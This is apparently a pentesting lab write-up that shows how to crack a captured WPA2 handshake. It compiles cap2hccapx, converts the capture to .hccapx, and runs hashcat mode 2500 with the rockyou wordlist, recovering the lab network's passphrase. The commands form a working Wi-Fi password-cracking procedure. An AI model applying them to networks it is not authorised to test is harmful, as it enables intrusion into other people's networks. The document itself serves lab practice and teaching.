Cracking WPA2 Handshake

This section will cover how to crack a WPA2 handshakes captured with the previously showcased attack vector


We need to convert the captured .pcap file into .hccapx format in order to start cracking with it. There's a tool named cap2hccapx which can help us do this. However, we first need to download and compile it on our unix system.

Compiling cap2hccapx

  • Downloading Source

  • Compiling Tool

gcc -o cap2hccapx cap2hccapx.c
  • Testing Tool



Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!

cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap  capture.hccapx

Cracking with .hccapx

I'll be using Hashcat for the cracking on my host machine. Here's a post where I explain why cracking on the host machine is better 😊!

.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force


tinkerbell is the PSK of the network in question

We were successfully able to crack the handshake and retrieve the password to the lab network!

Last updated